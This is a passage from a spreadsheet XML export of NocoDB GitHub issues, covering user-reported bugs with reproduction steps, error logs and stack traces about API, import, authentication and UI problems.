/dashboard/_nuxt/fonts/materialdesignicons-webfont.2ec256c.woff2 200 224348 - 5.941 ms GET /dashboard/ 200 2855 - 1.901 ms GET /dashboard/_nuxt/3905e44.js 200 3732 - 8.117 ms GET /dashboard/_nuxt/6bd9d66.js 200 245540 - 8.354 ms GET /dashboard/_nuxt/44db1cc.js 200 209471 - 9.396 ms GET /dashboard/_nuxt/be8fb6e.js 200 1897780 - 8.768 ms GET /dashboard/_nuxt/c66fc74.js 200 21982 - 2.114 ms POST /dashboard/?q=sqlOp_xcPluginRead 401 70 - 1.125 ms GET /dashboard/favicon-32.png 200 1749 - 1.693 ms POST /api/v1/auth/refresh-token 404 165 - 3.090 ms GET /dashboard/auth/type 200 222 - 2.233 ms GET /dashboard/_nuxt/333a606.js 200 29825 - 3.842 ms GET /dashboard/_nuxt/dfacdf9.js 200 27029 - 3.703 ms GET /dashboard/_nuxt/fonts/MaterialIcons-Regular.12a47ed.woff2 200 60840 - 8.130 ms GET /dashboard/_nuxt/5641aa5.js 200 72112 - 8.410 ms GET /dashboard/_nuxt/fonts/materialdesignicons-webfont.2ec256c.woff2 200 224348 - 7.499 ms GET /dashboard/_nuxt/img/512x512-trans.5601bce.png 200 246642 - 8.860 ms GET /dashboard 301 185 - 1.424 ms GET /dashboard/ 200 2855 - 1.346 ms GET /dashboard/_nuxt/3905e44.js 200 3732 - 2.546 ms GET /dashboard/_nuxt/44db1cc.js 200 209471 - 4.712 ms GET /dashboard/_nuxt/6bd9d66.js 200 245540 - 4.884 ms GET /dashboard/_nuxt/be8fb6e.js 200 1897780 - 5.292 ms GET /dashboard/_nuxt/333a606.js 200 29825 - 3.798 ms GET /dashboard/_nuxt/dfacdf9.js 200 27029 - 3.443 ms GET /dashboard/_nuxt/5641aa5.js 200 72112 - 1.940 ms POST /dashboard/?q=sqlOp_xcPluginRead 401 70 - 1.148 ms POST /api/v1/auth/refresh-token 404 165 - 1.007 ms GET /dashboard/auth/type 200 222 - 1.519 ms GET /dashboard/favicon-32.png 200 1749 - 1.883 ms GET /dashboard/db/mysql.png.jpg 200 3132 - 11.375 ms GET /dashboard/db/mssql.png.jpg 200 3619 - 11.608 ms GET /dashboard/db/postgre.png.jpg 200 3892 - 12.592 ms GET /dashboard/db/maria.png.jpg 200 3304 - 12.317 ms GET /dashboard/db/aurora.png 200 2511 - 12.221 ms GET /dashboard/_nuxt/img/512x512-trans.5601bce.png 200 246642 - 15.611 ms GET /dashboard/db/sqlite.svg 200 9886 - 3.870 ms GET /dashboard/_nuxt/c66fc74.js 200 21982 - 1.605 ms GET /dashboard/_nuxt/fonts/MaterialIcons-Regular.12a47ed.woff2 200 60840 - 6.683 ms GET /dashboard/_nuxt/fonts/materialdesignicons-webfont.2ec256c.woff2 200 224348 - 5.418 ms &lt;/pre&gt; &lt;/details&gt;</t>
  </si>
  <si>
    <t>https://github.com/nocodb/nocodb/issues/267</t>
  </si>
  <si>
    <t>"Email must be valid" error for valid email with a four-character top-level domain</t>
  </si>
  <si>
    <t>Version: Latest Docker When attempting to create a new user that has a four-character top-level domain in the email address, an "E-mail must be valid" error is returned. For example, the email test@test.live is said to be invalid. However, I was able to sign up with that email, without seeing any errors. Steps to Replicate Create a new user with a four-character TLD in the email such as "test@test.live" Sign out Try to sign back in Observe the "E-mail must be valid" message What is Expected? The Email is valid per RFC spec and should be allowed.</t>
  </si>
  <si>
    <t>https://github.com/nocodb/nocodb/issues/288</t>
  </si>
  <si>
    <t>Swagger UI doesn't use NC_PUBLIC_URL</t>
  </si>
  <si>
    <t>**Please enter the following details** Node: **v12.22.1** Arch: **x64** Platform: **linux** Docker: **true** Database: **pg** ProjectOnRootDB: **false** RootDB: **mysql2** PackageVersion: **0.9.33** **Steps To Reproduce** 1. Run NocoDB using Docker, and set the NC_PUBLIC_URL environment variable (e.g. `NC_PUBIC_URL=https://nocodb.example.com`). Serve the site at that URL using a reverse proxy. 2. From NocoDB (at the public URL), click avatar &gt; Swagger APIs Doc to open the Swagger UI 3. Despite being served from the public URL, Swagger shows the base URL as localhost:8080, which causes the endpoints to fail when tested. **Expected behavior** I would expect Swagger to use the public URL to generate the REST endpoints. **Screenshots** ![image](https://user-images.githubusercontent.com/2007008/122275796-1a8ed180-ceb2-11eb-9146-0ccbd5886d94.png) ![image](https://user-images.githubusercontent.com/2007008/122275858-2d090b00-ceb2-11eb-838d-e7f85ab628b2.png)</t>
  </si>
  <si>
    <t>https://github.com/nocodb/nocodb/issues/290</t>
  </si>
  <si>
    <t>Audit Log - DELETE is not right now recording</t>
  </si>
  <si>
    <t>https://github.com/nocodb/nocodb/issues/291</t>
  </si>
  <si>
    <t>xc-token - After deleting the token from backend admin, it's still working with the deleted token (it has to be invalid)</t>
  </si>
  <si>
    <t>Node: **v10.19.0** Arch: **x64** Platform: **linux** Docker: **false** Database: **mysql2** ProjectOnRootDB: **false** RootDB: **sqlite3** PackageVersion: **1.0.0**</t>
  </si>
  <si>
    <t>https://github.com/nocodb/nocodb/issues/295</t>
  </si>
  <si>
    <t>Filter feature issue</t>
  </si>
  <si>
    <t>I have a table w/ columns accepting null value. A **nocodb filter** researching column w/ null value return 0 rows. (of course I have plenty of records normally matching the filter. Checked w/ Navicat)</t>
  </si>
  <si>
    <t>https://github.com/nocodb/nocodb/issues/297</t>
  </si>
  <si>
    <t>Cannot Add/Edit record properly when table has composite keys</t>
  </si>
  <si>
    <t>**Please enter the following details** Node: **v12.22.1** Arch: **x64** Platform: **linux** Docker: **true** Database: **mysql2** ProjectOnRootDB: **true** RootDB: **mysql2** PackageVersion: **0.9.35** **Steps To Reproduce** Cannot add record properly 1. Go to Tables, and create new table with several keys as mark as PK 2. Create Gallery View 3. on Gallery View Page, Click on Add new Row Button 4. The primary key is not editable, cannot type anything to the field Cannot Edit record properly 1. Try add new row using Grid View, it will shows some error since there are multiple PKs but continue to fill all of the column 2. Then after finish adding all of the column, ensure that the data saved 3. Try edit one of the value, and save row 4. It will shows 400 error **Expected behavior** On Add new Row it is expected that user could type in the PK field, since it is not auto increment On Edit row, it is expected that user could save the changes properly **Screenshots** on Add new Row, the PK fields seems to have attribute disabled ![Screen Shot 2021-06-23 at 12 56 17](https://user-images.githubusercontent.com/1900931/123043390-6bf30f80-d422-11eb-942a-d298f7b31e2a.png) on Edit Row ![Screen Shot 2021-06-23 at 09 15 27](https://user-images.githubusercontent.com/1900931/123043481-89c07480-d422-11eb-9f72-99f8a875d886.png) error logs  PUT /nc/shipment_QoHo/api/v1/shipping_price/jne,regs,1,2 400 280 - 2.371 ms Error: Undefined binding(s) detected when compiling UPDATE. Undefined column(s): [service_type, destination_code, origin_code] query: update `xa2__shipping_price` set `service_type` = ?, `price` = ? where `courier` = ? and `service_type` = ? and `destination_code` = ? and `origin_code` = ? at QueryCompiler_MySQL.toSQL (/usr/src/app/node_modules/knex/lib/query/compiler.js:98:13) at Builder.toSQL (/usr/src/app/node_modules/knex/lib/query/builder.js:97:44) at Builder.Target.toQuery (/usr/src/app/node_modules/knex/lib/interface.js:8:21) at o._run (/usr/src/app/docker/main.js:2:294853) at o.updateByPk (/usr/src/app/docker/main.js:2:281531) at async r.update (/usr/src/app/docker/main.js:2:264326) PUT /nc/shipment_QoHo/api/v1/shipping_price/jne,regs,1,2 400 293 - 4.237 ms (node:8) Warning: Label 'fetch user' already exists for console.time() (node:8) Warning: Label 'fetch user' already exists for console.time()  Join our discord : https://discord.gg/5RgZmkW for realtime help.</t>
  </si>
  <si>
    <t>https://github.com/nocodb/nocodb/issues/315</t>
  </si>
  <si>
    <t>graphql: Can't reload view data</t>
  </si>
  <si>
    <t>**Please enter the following details** Node: **v12.22.1** Arch: **x64** Platform: **linux** Docker: **false** Database: **pg** ProjectOnRootDB: **false** RootDB: **sqlite3** PackageVersion: **0.9.40** **Steps To Reproduce** 1. set up project using postgresql with graphql 2. hit "reload view data"  XHRPOSThttp://10.1.10.24:30008//nc/repertoire_mpl6/v1/graphql [HTTP/1.1 404 Not Found 28ms]  Note the double `//` **Expected behavior** **Screenshots**</t>
  </si>
  <si>
    <t>https://github.com/nocodb/nocodb/issues/343</t>
  </si>
  <si>
    <t>Bug: failed to import meta data</t>
  </si>
  <si>
    <t>**Please enter the following details** Background: I have 2 nocodb instances, lets say A and B. I want to migrate from A to B. I exported metadata from A as meta.zip, then i take a snapshot from Database-A to create Database-B. A project in B is also configured. **Steps To Reproduce** 1. In B, click ``Import Metadata`` (either in My Projects page or in Metadata Operations) 2. It toasts "Some internal error occurred". 3. In Network tab (Chrome), it shows ``{msg: "Malformed UTF-8 data"}`` when calling ``xcMetaTablesImportZipToLocalFsAndDb``. P.S. There is no server logs related to this import action. **Expected behavior** The project meta zip can be imported. Node: **v12.22.1** Arch: **x64** Platform: **linux** Docker: **true** Database: **pg** ProjectOnRootDB: **false** RootDB: **pg** PackageVersion: **0.10.3**</t>
  </si>
  <si>
    <t>https://github.com/nocodb/nocodb/issues/348</t>
  </si>
  <si>
    <t>Bug: APIs related to M2M columns become undefined in Swagger</t>
  </si>
  <si>
    <t>**Please enter the following details** APIs related to M2M columns become undefined in Swagger **Steps To Reproduce** 1. Create a table called ``Table A`` 2. Create a table called ``Table B`` 3. In ``Table B``, create a M2M column linking to ``Table A`` 4. Go to Swagger, there are two called ``TableAHasManyundefined`` and ``TableBHasManyundefined``. 5. Try executing something like ``/nc/xxxxxxxxx/api/v1/TableB/has/m2mTableA_TableB'`` and got the following result. json { "msg": "Cannot read property 'columnToAlias' of undefined" }  6. There are some APIs with undefined id as well  /nc/xxxxxxxxx/api/v1/TableB/{TableBId}/m2mTableA_TableB/{undefinedId}  **Expected behavior** No undefined values Node: v12.22.1 Arch: x64 Platform: linux Docker: true Database: pg ProjectOnRootDB: false RootDB: pg PackageVersion: 0.10.3</t>
  </si>
  <si>
    <t>https://github.com/nocodb/nocodb/issues/388</t>
  </si>
  <si>
    <t>M2M lenked subtable column adding</t>
  </si>
  <si>
    <t>NocoDB used as docker : true NocoDB version : 0.11.4 Database used in NC_DB URL : mysql Project was created by clicking : New Project by connecting to external database Database on which spreadsheet is created : mysql OS on which NocoDB is running : linux Node.js version if running as node : container Database version : MariaDB10 **Steps To Reproduce** Go to m2m value, right click, select m2m_autocreated_table, add column, reload table tabs, tables can't load **Console log** 9c25114.js:2 TypeError: Cannot read property '_cn' of undefined at e4574a1.js:2 at Array.reduce (&lt;anonymous&gt;) at f.hasMany (e4574a1.js:2) at Cn.get (9c25114.js:2) at Cn.evaluate (9c25114.js:2) at f.hasMany (9c25114.js:2) at f.&lt;anonymous&gt; (e4574a1.js:2) at f.t._render (9c25114.js:2) at f.r (9c25114.js:2) at Cn.get (9c25114.js:2) re @ 9c25114.js:2 /nc/noco_test_1_YtiM/api/v1/test3?limit=25&amp;offset=0&amp;where=&amp;sort=&amp;hm=&amp;bt=&amp;mm=test2&amp;mfields1=title,id:1 Failed to load resource: the server responded with a status of 400 () /nc/noco_test_1YtiM/api/v1/test3/count?where=:1 Failed to load resource: the server responded with a status of 400 () e4574a1.js:2 Error: Request failed with status code 400 at t.exports (9c25114.js:2) at t.exports (9c25114.js:2) at XMLHttpRequest..onreadystatechange (9c25114.js:2)</t>
  </si>
  <si>
    <t>https://github.com/nocodb/nocodb/issues/400</t>
  </si>
  <si>
    <t>Bug: Import not working</t>
  </si>
  <si>
    <t>**Steps To Reproduce** Case 1: 1. create a project (sqlite) 2. create some tables 3. export to zip 4. import it back to the same project. it shows "some internal error occurred".  Request URL: &lt;REDACTED&gt;/dashboard/?q=sqlOp_xcMetaTablesImportZipToLocalFsAndDb&amp;project_id=test_AcEi Request Method: POST Status Code: 400 Bad Request  Response  {"msg":"Project with id 'project_1_Qd9-' already exist"}  Case 2: 1. create a project (sqlite) 2. create some tables 3. export to zip 4. Delete the project 5. import zip in My Projects. it shows "some internal error occurred".  Request URL: &lt;REDACTED&lt;/dashboard/?q=sqlOp_xcMetaTablesImportZipToLocalFsAndDb Request Method: POST Status Code: 403 Forbidden  Response:  {"msg":"Not allowed"}  **Expected behavior** Case 1: If it is not allowed to import to the same project. It may show some useful message instead of "some internal error occurred". **Further discussion:** if it is not allowed to import to the existing project. Then there is no point to include this import function in Project Metadata page. If the project does not exist, basically it will create a new one so it is weird to create a new project inside another project. Case 2: metadata is expected to be loaded. Node: **v12.22.1** Arch: **x64** Platform: **linux** Docker: **true** Database: **pg** ProjectOnRootDB: **false** RootDB: **sqlite3** PackageVersion: **0.11.6**</t>
  </si>
  <si>
    <t>https://github.com/nocodb/nocodb/issues/410</t>
  </si>
  <si>
    <t>Unable to update/delete/select records for composite primary keys from swagger</t>
  </si>
  <si>
    <t>In swagger the primary key field is set to integer by default because it considers the default primary key to be 'id'. But if we add a new primary key [composite along with default 'id' key], then while updating/deleting/selecting we need to provide value for primary-key in the format &lt;id-field-value&gt;___&lt;secondary-primary-key-value&gt;. So this primary key is a string. Can this primary-key type be changed to string instead? Also if there is a way to remove dependency from default 'id' field, it would be great help?</t>
  </si>
  <si>
    <t>https://github.com/nocodb/nocodb/issues/515</t>
  </si>
  <si>
    <t>Find/Get By Id does not return the Rollup result</t>
  </si>
  <si>
    <t>NocoDB used as docker : false NocoDB version : 0.11.29 Database used in NC_DB URL : mariadb Project was created by clicking : New Project by connecting to external database Database on which spreadsheet is created : mariadb OS on which NocoDB is running : MAC OS Node.js version if running as node : v14.15.1 Database version : 10.6.4-MariaDB-1:10.6.4+maria~focal **Steps To Reproduce** **1.Table Setting** **1.1 Promotion Table** ![image](https://user-images.githubusercontent.com/41875799/132243763-5f405903-f5e2-4d72-a25d-9075474af282.png) **1.2 User Table** ![image](https://user-images.githubusercontent.com/41875799/132243845-007e2047-b03d-4426-92ea-bbbe23e4a8b8.png) **2. The Rollup result can be returned when execute"http://localhost:8080/nc/dwz_chEy/api/v1/User"** ![image](https://user-images.githubusercontent.com/41875799/132269921-d38b7d6c-8fc8-4344-bf81-1e2db7eab6ab.png) **3. But get by ID does not return the Rollup result when execute"http://localhost:8080/nc/dwz_chEy/api/v1/User/1"** ![image](https://user-images.githubusercontent.com/41875799/132244038-c0fcd8bf-def0-407b-a84a-b6957f61ec0c.png) **Expected behavior** The Rollup result should be returned</t>
  </si>
  <si>
    <t>https://github.com/nocodb/nocodb/issues/641</t>
  </si>
  <si>
    <t>generated uuid is not returned on record creation with rest API</t>
  </si>
  <si>
    <t>**Please enter the following details** NocoDB used as docker : true NocoDB version : 0.11.42 Database used in NC_DB URL : pg Project was created by clicking : New Project by connecting to external database Database on which spreadsheet is created : pg OS on which NocoDB is running : Ubuntu 20.04 Node.js version if running as node : as in docker image Database version : Postgres 14.0 **Steps To Reproduce** 1. Create any table 2. Add any field with uuid type with `gen_random_uuid()` default value 3. Create any record with rest api. Result will include null value for the field. **Expected behavior** Result should include generated uuid.</t>
  </si>
  <si>
    <t>https://github.com/nocodb/nocodb/issues/651</t>
  </si>
  <si>
    <t>table name with underscore problem</t>
  </si>
  <si>
    <t>Node: **v12.22.6** Arch: **x64** Platform: **linux** Docker: **true** Database: **mysql2** ProjectOnRootDB: **false** RootDB: **mysql2** PackageVersion: **0.11.46** My db table **tnm_M** contains an underscore. This causes 2 unexpected consequences: 1. In the UI sidebar the table is showed without the underscore as you can see from picture below ![image](https://user-images.githubusercontent.com/454321/137497766-252468d5-9b69-4c36-ae79-5c62ea28a4c0.png) 2. Even the API get modified ![image](https://user-images.githubusercontent.com/454321/137498394-56147103-a9b0-4995-9463-743cc8e5171f.png) great tool, thank you</t>
  </si>
  <si>
    <t xml:space="preserve">the api will be modified , because of inproper name of db </t>
  </si>
  <si>
    <t>yes, but it does not make it rest api bug</t>
  </si>
  <si>
    <t>https://github.com/nocodb/nocodb/issues/652</t>
  </si>
  <si>
    <t>Camel case / As is in API</t>
  </si>
  <si>
    <t>Node: **v12.22.6** Arch: **x64** Platform: **linux** Docker: **true** Database: **mysql2** ProjectOnRootDB: **false** RootDB: **mysql2** PackageVersion: **0.11.46** Case of table fields is not honored. ![Screenshot 2021-10-15 at 15 50 39](https://user-images.githubusercontent.com/943152/137498163-d7dee1c8-485e-4d5d-a5df-31976632e80b.png) Calling API with curl produces the following result: [{"Id":1,"Name":"M0"},{"Id":2,"Name":"M1"},{"Id":3,"Name":"Mx"},{"Id":4,"Name":"M1a"},{"Id":5,"Name":"M1b"},{"Id":6,"Name":"M1c"}] **Expected behavior** field names should be lowercase.</t>
  </si>
  <si>
    <t>https://github.com/nocodb/nocodb/issues/725</t>
  </si>
  <si>
    <t>Bug: Id should encode to pass in url path for update and delete API</t>
  </si>
  <si>
    <t xml:space="preserve">Current API url  /nc/xx/api/v1/CatalogTest/9x1FROGBs/VXn9Zv2VDKtsfqK7c=  &gt; Note: `9x1FROGBs/VXn9Zv2VDKtsfqK7c=` is primary key of the record  Expected behaviour Id value should be encoded using `encodeURLComponent` method  /nc/xx/api/v1/CatalogTest/9x1FROGBs%2FVXn9Zv2VDKtsfqK7c= </t>
  </si>
  <si>
    <t>https://github.com/nocodb/nocodb/issues/755</t>
  </si>
  <si>
    <t>Incorrect offset in pagination when increased number of shown records</t>
  </si>
  <si>
    <t>I successfully increased number of records shown in tables via changing DB_QUERY_LIMIT_MIN, but pagination still using offset equal 25. Node: **v12.22.6** Arch: **x64** Platform: **linux** Docker: **false** Database: **pg** ProjectOnRootDB: **true** RootDB: **pg** PackageVersion: **0.81.1** **Steps To Reproduce** 1. Create new project via Heroku, internal DB, new table 2. Create 200 records 3. In Config Vars add DB_QUERY_LIMIT_MIN = 100 4. See first 100 records on the first page of pagination 5. But also, see many other pages in pagination. Second page shows records from 26 to 126. Third page shows records from 51 to 151, etc. **Expected behavior** In this example would be 2 pages in pagination. Second page shows records from 101 to 200.</t>
  </si>
  <si>
    <t>https://github.com/nocodb/nocodb/issues/856</t>
  </si>
  <si>
    <t>Stop returning REST response with `Has Many`, `Belongs To`, or `Many to Many` by default, because they can be controlled if query params `bt`, `hm`, or `mm` are set</t>
  </si>
  <si>
    <t>please provide the following details : NocoDB used as docker : false (heroku) NocoDB version : 0.83.5 Database used in NC_DB URL pg Project was created by clicking : New Project by connecting to external database Database on which spreadsheet is created : pg OS on which NocoDB is running : heroku hobby dynamo Node.js version if running as node : v12.22.6 Database version : * NoCoDB: PostgreSQL 13.5 (Ubuntu 13.5-2.pgdg20.04+1) on x86_64-pc-linux-gnu, compiled by gcc (Ubuntu 9.3.0-17ubuntu1~20.04) 9.3.0, 64-bit * Project DB: PostgreSQL 14.1 on aarch64-unknown-linux-gnu, compiled by gcc (Ubuntu 10.3.0-1ubuntu1~20.04) 10.3.0, 64-bit **Steps To Reproduce** 1. Query GET for a resource that has bt, hm or mm without setting bt, hm, mm `api/v1/countries` which `has many`.`places` **Expected behavior** JSON should return the entity without any joins **Actual behaviour** All relations are returned with no apparent way to turn it off [ { "Id": 1, "title": "Country A", "CreatedAt": "2021-12-09T11:05:44.540Z", "UpdatedAt": "2021-12-12T11:00:23.904Z", "is_published": true, "placesList": [ { "Id": 4, "title": "Place A", "CountriesId": 1 }, { "Id": 6, "title": "Place B", "CountriesId": 1 }, { "Id": 7, "title": "Place C", "CountriesId": 1 } ] }, { "Id": 2, "title": "Country B", "CreatedAt": "2021-12-09T11:05:50.562Z", "UpdatedAt": "2021-12-12T11:00:39.131Z", "is_published": true, "placesList": [] } ]  I tried setting bt, hm, mm to `undefined` or `null` or `false` to disable this behaviour but go this error when I try { "msg": "Cannot read property 'columnToAlias' of undefined" }  Node: **v12.22.6** Arch: **x64** Platform: **linux** Docker: **false** Database: **pg** ProjectOnRootDB: **false** RootDB: **pg** PackageVersion: **0.83.5**</t>
  </si>
  <si>
    <t>https://github.com/nocodb/nocodb/issues/880</t>
  </si>
  <si>
    <t>Upload CSV Import Error</t>
  </si>
  <si>
    <t>NocoDB used as docker : false NocoDB version : 0.83.8 Database used in NC_DB URL : sqlite3 Project was created by clicking : New Project Database on which spreadsheet is created : sqlite3 OS on which NocoDB is running : Ubuntu 20.04.3 LTS Node.js version if running as node : v14.13.0 Database version : 3.33.0 **Steps To Reproduce** 1. Go to New/Existing Project -&gt; Tables -&gt; New/Existing table 2. Click on Action -&gt; Upload CSV -&gt; Select any csv file having all the required columns (id, title) -&gt; Import 3. See error: POST /nc/xyz_op0t/api/v1/xyz/bulk 400 40 - 7.051 ms .returning() is not supported by sqlite3 and will not have any effect. **Expected behavior** The selected CSV file is supposed to be imported and shown as table. **Screenshots** ![Screenshot from 2021-12-18 23-31-02](https://user-images.githubusercontent.com/36279345/146651266-7e51be31-3aa1-4a6b-9177-5e23ea214762.png) ![Screenshot from 2021-12-18 23-32-22](https://user-images.githubusercontent.com/36279345/146651350-7953badf-56a1-44f2-b56d-2f9b30bd2a7c.png) ![Screenshot from 2021-12-18 23-32-26](https://user-images.githubusercontent.com/36279345/146651360-ee56d427-3ec1-4829-829b-8ca782485111.png) ![Screenshot from 2021-12-18 23-32-46](https://user-images.githubusercontent.com/36279345/146651370-77eb6eeb-b2ee-408b-bded-764eb4a50dee.png) ![Screenshot from 2021-12-18 23-32-49](https://user-images.githubusercontent.com/36279345/146651378-4c2081b4-1ac8-4776-87c2-e75c4b263f4e.png) ![Screenshot from 2021-12-18 23-33-14](https://user-images.githubusercontent.com/36279345/146651386-34f51369-98ae-48b0-974b-69b3e305fd77.png)</t>
  </si>
  <si>
    <t>https://github.com/nocodb/nocodb/issues/953</t>
  </si>
  <si>
    <t>[Bug] Condition for webhook automation does not take boolean type into consideration</t>
  </si>
  <si>
    <t>NocoDB used as docker : **false** NocoDB version : **"nocodb": "^0.84.6"** Database used in NC_DB URL : **pg** Project was created by clicking : **New Project by connecting to external database** Database on which spreadsheet is created : **pg** OS on which NocoDB is running : **Ubuntu 18.04.6 LTS** Node.js version if running as node : **v15.3.0** Database version : **Postgres 12.9** **Steps To Reproduce** 1. Install Slack App 1. Create webhook automation for Slack app that happens after an update 1. Add a condition for when the update happens 1. Condition needs to be related to a column like a checkbox or another column that implements a boolean type (TRUE/FALSE) 1. Example condition would be: `where, column_name, is equal, true` **Notes** 1. An example JSON that is sent back to the BE is: "[{\"field\":\"Validated\",\"op\":\"is equal\",\"value\":\"true\",\"logicOp\":\"and\"}]"). 1. Even after the values are parsed, with JSON.parse, the value remains a string:  [ { "field": "Validated", "op": "is equal", "value": "true", "logicOp": "and" } ]  1. The check I believe happens here: https://github.com/nocodb/nocodb/blob/1cbaaab6bf838aa8c38a35f3fab06670ca8d9264/packages/nocodb/src/lib/noco/common/BaseModel.ts#L397. `data[field]` is probably `TRUE` while `con.value` is `"true"`. These would never equate unless the value itself is parsed further to see if it can be converted into a boolean value. The suggested change would probably be to just do: `JSON.parse(con.value)`. **Expected behavior** When the condition is met, such as when a column is true and the condition put in is `"true"`, then the webhook should be sent out afterward. I believe this is not happening because the values are not parsed from the JS side, I believe they are all literal strings instead of appropriate values.</t>
  </si>
  <si>
    <t>https://github.com/nocodb/nocodb/issues/985</t>
  </si>
  <si>
    <t>Once signed in &amp; signed out from a browser - invalid credentials also signs in (This has to be the same browser)</t>
  </si>
  <si>
    <t>please provide the following details : NocoDB used as docker : true - official. NocoDB version : 0.84.6 Database used in NC_DB URL : mysql Project was created by clicking : New Project Database on which spreadsheet is created : mysql Node.js version if running as node : Database version : 8.0 **Steps To Reproduce** - open a fresh browser you never save info in. In my case Edge. - login as admin. In my case - dgleba@gmail.com - sign out. - try to sign in with incorrect username: a and password: a [or any username and password like that]. - projects are shown. username in top corner is `sign up`. - you can edit data. **Expected behavior** incorrect credentials should not give successful access to data. **Screenshots** Platform: **linux** Docker: **true**</t>
  </si>
  <si>
    <t>https://github.com/nocodb/nocodb/issues/1129</t>
  </si>
  <si>
    <t>Cannot add Percentage as a column</t>
  </si>
  <si>
    <t xml:space="preserve">NocoDB used as docker : **true** NocoDB version : **0.84.9** Database used in NC_DB URL : **pg** Project was created by clicking : **New Project by connecting to external database** Database on which spreadsheet is created : **pg** OS on which NocoDB is running : **Docker/Rocky Linux 8** Database version : **14.1-1.pgdg110+1** Node : **v12.22.6** Arch : **x64** ProjectOnRootDB: **true** **Steps To Reproduce** 1. Go to a table 2. Add new column --&gt; Percentage type 3. "Update table failed", no column is added. **Expected behavior** Should add Percentage column. Dev Console Error:  POST https://noco.anchorhrg.com/dashboard/?q=sqlOpPlus_tableUpdate 500 (anonymous) @ 3370c21.js:2 t.exports @ 3370c21.js:2 t.exports @ 3370c21.js:2 Promise.then (async) v.request @ 3370c21.js:2 (anonymous) @ 3370c21.js:2 (anonymous) @ 35a1cff.js:2 m @ 5d83827.js:2 (anonymous) @ 5d83827.js:2 A.forEach.t.&lt;computed&gt; @ 5d83827.js:2 r @ 3370c21.js:2 l @ 3370c21.js:2 (anonymous) @ 3370c21.js:2 (anonymous) @ 3370c21.js:2 ActSqlOpPlus @ 35a1cff.js:2 (anonymous) @ 3370c21.js:2 m.dispatch @ 3370c21.js:2 dispatch @ 3370c21.js:2 (anonymous) @ 99706d2.js:2 m @ 5d83827.js:2 (anonymous) @ 5d83827.js:2 A.forEach.t.&lt;computed&gt; @ 5d83827.js:2 r @ 3370c21.js:2 l @ 3370c21.js:2 (anonymous) @ 3370c21.js:2 (anonymous) @ 3370c21.js:2 save @ 99706d2.js:2 ee @ 3370c21.js:2 n @ 3370c21.js:2 ee @ 3370c21.js:2 t.$emit @ 3370c21.js:2 click @ 5d83827.js:2 ee @ 3370c21.js:2 n @ 3370c21.js:2 Fr.c._wrapper @ 3370c21.js:2 35a1cff.js:2 index 0 99706d2.js:2 Error: Request failed with status code 500 at t.exports (3370c21.js:2:178381) at t.exports (3370c21.js:2:208481) at XMLHttpRequest.A (3370c21.js:2:176975) </t>
  </si>
  <si>
    <t>https://github.com/nocodb/nocodb/issues/1132</t>
  </si>
  <si>
    <t>Postgres : SingleSelect/Multiselect isn't working in 0.84.9</t>
  </si>
  <si>
    <t>Was fine in earlier version.</t>
  </si>
  <si>
    <t>https://github.com/nocodb/nocodb/issues/1638</t>
  </si>
  <si>
    <t>DATEADD formula issues</t>
  </si>
  <si>
    <t>Using DATEADD formula (`IF(NOW() &lt; DATEADD(test_date_time,10,'day'), "true", "false")` like in [docs](https://docs.nocodb.com/setup-and-usages/formulas#date-functions)) results in empty table. There is error console with code 400 in response to GET database entries request. Response body has message noting that there is no $1 operator: `timestamp with time zone &lt; text`. To test, I've tried basic image ( `docker run -d --name nocodb -p 8080:8080 nocodb/nocodb:latest`) and there DATEADD works, though date subtraction fails, as it planned in #1415 . Providing negative number in formula results in 400 error with msg "Cannot read property 'argument' of undefined". Node: **v12.22.10** Arch: **x64** Platform: **linux** Docker: **true** Database: **pg** ProjectOnRootDB: **true** RootDB: **pg** PackageVersion: **0.84.16**</t>
  </si>
  <si>
    <t>https://github.com/nocodb/nocodb/issues/1662</t>
  </si>
  <si>
    <t>Editor role- download CSV not allowed</t>
  </si>
  <si>
    <t xml:space="preserve">Node: **v14.18.0** Arch: **arm64** Platform: **darwin** Docker: **false** Database: **mysql2** ProjectOnRootDB: **false** RootDB: **sqlite3** PackageVersion: **0.84.16** - open country table - enable 'editor' preview mode - download CSV  GET /api/v1/db/meta/tables/md_us58ca8gz6q6i1 304 - - 5.017 ms projectAclMiddleware :: Forbidden [Error]: csvDataExport - editor : Not allowed at Function.forbidden (/Users/rajuudava/NocoDB/nocodb/packages/nocodb/src/lib/noco/meta/helpers/catchError.ts:47:11) at projectAclMiddleware (/Users/rajuudava/NocoDB/nocodb/packages/nocodb/src/lib/noco/meta/helpers/ncMetaAclMw.ts:63:17) at /Users/rajuudava/NocoDB/nocodb/packages/nocodb/src/lib/noco/meta/helpers/catchError.ts:6:20 at Layer.handle [as handle_request] (/Users/rajuudava/NocoDB/nocodb/packages/nocodb/node_modules/express/lib/router/layer.js:95:5) at next (/Users/rajuudava/NocoDB/nocodb/packages/nocodb/node_modules/express/lib/router/route.js:137:13) at authMiddleware (/Users/rajuudava/NocoDB/nocodb/packages/nocodb/src/lib/noco/meta/helpers/ncMetaAclMw.ts:23:7) at /Users/rajuudava/NocoDB/nocodb/packages/nocodb/src/lib/noco/meta/helpers/catchError.ts:6:20 at Layer.handle [as handle_request] (/Users/rajuudava/NocoDB/nocodb/packages/nocodb/node_modules/express/lib/router/layer.js:95:5) at next (/Users/rajuudava/NocoDB/nocodb/packages/nocodb/node_modules/express/lib/router/route.js:137:13) at exports.default (/Users/rajuudava/NocoDB/nocodb/packages/nocodb/src/lib/noco/meta/helpers/extractProjectIdAndAuthenticate.ts:141:5) GET /api/v1/db/data/noco/stupid_flyingfish/Country/views/Country/export/csv?offset=0 403 46 - 4.161 ms </t>
  </si>
  <si>
    <t>https://github.com/nocodb/nocodb/issues/1693</t>
  </si>
  <si>
    <t>Expanded card (hmList) is empty for relational column in Commenter/ Viewer mode</t>
  </si>
  <si>
